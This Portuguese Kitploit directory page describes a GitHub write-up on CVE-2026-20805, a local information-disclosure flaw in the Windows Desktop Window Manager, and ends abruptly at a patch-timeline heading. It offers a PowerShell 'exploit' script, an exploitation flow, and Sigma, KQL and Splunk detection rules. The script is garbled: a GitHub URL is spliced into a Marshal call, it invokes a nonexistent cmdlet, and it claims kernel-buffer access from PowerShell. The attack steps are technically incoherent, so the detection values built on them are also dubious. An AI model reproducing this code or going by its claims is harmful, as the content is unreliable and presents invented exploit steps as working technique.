Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Inside-CVE-2026-20805-How-a-Windows-DWM-Flaw-Exposed-Sensitive-Data — CVE‑2026‑20805: Uma falha no Windows Desktop Window Manager que causa divulgação local de informações. Requer privilégios baixos, sem interação do usuário. Classificada como CVSS 5.5 (Média). Explorada ativamente e listada no CISA KEV; correção lançada em janeiro de 2026. | Kitploit
Ferramentas/GitHubGitHub/mrk336/inside-cve-2026-20805-how-a-windows-dwm-flaw-exposed-sensitive-data
Análise de VulnerabilidadesExploraçãoColeta de InformaçõesAprendizado e EducaçãoResposta a Incidentes
GitHubmrk336/inside-cve-2026-20805-how-a-windows-dwm-flaw-exposed-sensitive-data

Inside-CVE-2026-20805-How-a-Windows-DWM-Flaw-Exposed-Sensitive-Data

CVE‑2026‑20805: Uma falha no Windows Desktop Window Manager que causa divulgação local de informações. Requer privilégios baixos, sem interação do usuário. Classificada como CVSS 5.5 (Média). Explorada ativamente e listada no CISA KEV; correção lançada em janeiro de 2026.

Ver Repositório
20há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Inside-CVE-2026-20805-How-a-Windows-DWM-Flaw-Exposed-Sensitive-Data

CVE‑2026‑20805: Uma falha no Windows Desktop Window Manager que causa divulgação local de informações. Requer privilégios baixos, sem interação do usuário. Classificada com CVSS 5.5 (Média). Explorada ativamente e listada no CISA KEV; patch lançado em janeiro de 2026.

Por Dentro do CVE 2026 20805: Como uma Falha no DWM do Windows Expôs Dados Sensíveis

1 Resumo Executivo

O CVE 2026 20805 é uma falha de divulgação de informações no Desktop Window Manager (DWM) – o componente central que renderiza a área de trabalho, compõe janelas e acelera a interface de usuário baseada em GPU.
Por que isso importa: a falha permite que um atacante local com privilégios baixos leia dados que deveriam estar confinados a outras sessões ou processos.

Principais atributos técnicos

AtributoValor
CWE‑200: Exposição de Informações Sensíveis a um Ator Não Autorizado✓
Vetor de ataqueLocal
Privilégios necessáriosBaixos
Interação do usuárioNenhuma
Impacto – confidencialidadeAlto
Impacto – integridadeNenhum
Impacto – disponibilidadeNenhum
Pontuação Base CVSS 3.15.5 (Média)

2 Entendendo o Desktop Window Manager

O DWM orquestra a memória da GPU, os buffers de janela e as superfícies de interface de usuário entre processos. É um alvo de alto valor porque agrega dados de múltiplos processos em um espaço compartilhado de GPU; uma falha aqui pode vazar credenciais ou dados de sessão entre usuários.

Papel do DWM no Windows moderno:

  1. Recebe atualizações de exibição do compositor.
  2. Aloca memória de GPU para cada janela.
  3. Gerencia a composição acelerada por GPU, permitindo transições visuais suaves e suporte a múltiplos monitores.

3 Detalhamento Técnico do CVE 2026 20805

Pré-requisitos do ataque

  • Atacante local com privilégios baixos, sem necessidade de interação do usuário.
  • A falha é acionada quando o DWM falha ao validar offsets na tabela de buffers de janela antes de copiar dados para a memória da GPU.

Como o CWE‑200 se aplica

A vulnerabilidade explora a falta de verificação de limites no índice do buffer de janela; isso permite que um atacante leia memória adjacente da GPU e obtenha segredos armazenados por outros processos.

Versões afetadas

Com base na lista CPE do NVD, o Windows 10.0.19041 (e derivados) é afetado.

4 Caminhos de Exploração

Abaixo está um fluxo conceitual de exploração:

  1. O atacante obtém um handle para o processo DWM via CreateProcess com privilégios mínimos.
  2. O atacante cria um índice que aponta para um slot adjacente de memória da GPU.
  3. O buffer criado é copiado para a rotina de composição de janelas do DWM, mesclando dados de outras sessões.
  4. O atacante lê o despejo de memória da GPU resultante e extrai informações sensíveis.

Código de exploração – script PowerShell

# Windows 10.0.19041 – Exploração de leitura de buffer do DWM
$processHandle = Get-Process -Name dwm | Select-Object -ExpandProperty Id
$bufferOffset = 0x00120000   # offset criado para memória adjacente da GPU
$targetWindow = 0x00030001    # índice da janela alvo

# Cria um buffer temporário no espaço do kernel
$kernelBuffer = [byte[]]::new(0x1000)
[System.Runtime.InteropServices.Marshal]:https://raw.githubusercontent.com/mrk336/inside-cve-2026-20805-how-a-windows-dwm-flaw-exposed-sensitive-data/main/:CopyMemory(
    $processHandle, 
    $bufferOffset, 
    $kernelBuffer, 
    0x1000)

# Copia o buffer do kernel para a rotina de composição do DWM
Invoke-DwmRead -ProcessId $processHandle `
                -WindowIndex $targetWindow `
                -SrcAddress $bufferOffset `
                -Size 0x1000

# Despeja os dados expostos em um arquivo local para análise
$dumpPath = "C:\Temp\DwmLeak.txt"
[IO.File]::WriteAllBytes($dumpPath, $kernelBuffer)

O script demonstra como um atacante pode aproveitar a memória de GPU do DWM para ler dados ocultos.


5. Engenharia de Detecção

A detecção do CVE‑2026‑20805 concentra-se em identificar interações anormais com dwm.exe e telemetria incomum relacionada à GPU. A exploração depende da leitura de buffers de memória suportados por GPU usando offsets criados, portanto, os defensores devem monitorar desvios do comportamento normal do Desktop Window Manager.

Fontes de Telemetria Relevantes

  • Sysmon
    • Event ID 1 (ProcessCreate)
    • Event ID 10 (HandleOpen)
  • Eventos ETW de GPU
    • Event ID 0x2B (DisplayUpdate)
  • Logs de Eventos do Windows
    • Application
    • System

Essas fontes fornecem visibilidade sobre criação de processos, acesso a handles e atividade de atualização de GPU.

Padrões Suspeitos

  1. Eventos repetidos de CreateProcess envolvendo dwm.exe, especialmente quando o processo pai não é explorer.exe.
  2. Eventos de alta frequência de DisplayUpdate (0x2B) seguidos por leituras de memória usando tamanhos ou offsets incomuns de buffer.
    • Exemplos de valores suspeitos:
      • SrcAddress: 0x00120000
      • Size: 0x1000
  3. Correlação entre eventos HandleOpen direcionados a dwm.exe e rajadas de atividade ETW de GPU.

Regra no Estilo Sigma

title: DWM GPU Memory Read Anomaly
id: dwm-gpu-memory-read-anomaly
status: experimental
description: Detects abnormal DWM buffer reads that may indicate exploitation of CVE-2026-20805.
author: Mark
logsource:
  product: windows
  service: system
detection:
  selection:
    EventID: 0x2B
    ProcessName: dwm.exe
    SrcAddress: 0x00120000
    Size: 0x1000
  condition: selection
falsepositives:
  - High GPU rendering workloads
level: medium
tags:
  - attack.defense-evasion

Microsoft Sentinel (KQL)

Acesso Suspeito a Handle para dwm.exe

SecurityEvent
| where EventID in (4656, 4663)
| where ProcessName !~ "dwm.exe"
| where ObjectName has "dwm.exe"
| summarize count() by Account, ProcessName, ObjectName, Computer, bin(TimeGenerated, 5m)
| where count_ > 5

Criação Inesperada de Processo Direcionada ao DWM

Sysmon
| where EventID == 1
| where Image endswith "dwm.exe"
| where ParentImage !endswith "explorer.exe"

Pico de Evento DisplayUpdate de GPU

Event
| where EventID == 0x2B
| summarize count() by Computer, bin(TimeGenerated, 1m)
| where count_ > 50

Correlação: HandleOpen Seguido por Atividade de GPU

let handles = SecurityEvent
    | where EventID == 4656 and ObjectName has "dwm.exe"
    | project TimeGenerated, Account, Computer;

let gpu = Event
    | where EventID == 0x2B
    | project TimeGenerated, Computer;

handles
| join kind=inner gpu on Computer
| where gpu_TimeGenerated between (TimeGenerated .. TimeGenerated + 2m)

Splunk (SPL)

Processos Não Padrão Abrindo Handles para dwm.exe

index=sysmon EventCode=10 TargetImage="*\\dwm.exe"
| where NOT match(ProcessName, "explorer.exe")
| stats count by ProcessName, TargetImage, User, Computer
| where count > 5

Eventos Inesperados de CreateProcess para dwm.exe

index=sysmon EventCode=1 Image="*\\dwm.exe"
| where NOT like(ParentImage, "%explorer.exe")
| table _time, Computer, ParentImage, Image, User

Pico de DisplayUpdate de GPU

index=windows EventCode=43
| timechart span=1m count
| where count > 50

Correlação: HandleOpen e Atividade de GPU

handles = search index=sysmon EventCode=10 TargetImage="*\\dwm.exe"
| eval key=Computer."-"._time
| table key, Computer, _time;

gpu = search index=windows EventCode=43
| eval key=Computer."-"._time
| table key, Computer, _time;

handles
| join key gpu
| table Computer, handles._time, gpu._time

6 Mitigação e Endurecimento

O aviso da Microsoft para o CVE 2026 20805 inclui um patch que valida os índices de buffer no DWM antes de copiar dados da GPU.

Cronograma do patch

Baixar ferramenta